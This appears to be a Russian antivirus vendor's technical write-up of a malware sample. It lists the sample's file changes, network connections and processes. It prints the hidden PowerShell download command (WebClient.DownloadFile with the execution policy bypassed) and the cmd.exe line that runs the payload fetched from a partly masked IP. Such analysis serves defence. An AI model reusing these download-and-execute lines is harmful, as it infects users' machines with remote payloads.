Техническая информация
Вредоносные функции
Загружает и запускает на исполнение
- http://84.##.132.112/scandocument#2343.exe как %appdata%\scandocument#2343
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\cmd.exe' /C %APPDATA%\SCANDOCUMENT#2343
Изменения в файловой системе
Создает следующие файлы
- %TEMP%\sbdtfhgygeghdpœ.sct
Удаляет следующие файлы
- %TEMP%\sbdtfhgygeghdpœ.sct
Сетевая активность
Подключается к
- '84.##.132.112':80
TCP
Запросы HTTP GET
- http://84.##.132.112/SCANDOCUMENT%232343.exe
- http://84.##.132.112/SCANDOCUMENT
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://84.##.132.112/SCANDOCUMENT#2343.exe','%APPDATA%\SCANDOCUMENT#2343')' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /C %APPDATA%\SCANDOCUMENT#2343' (со скрытым окном)
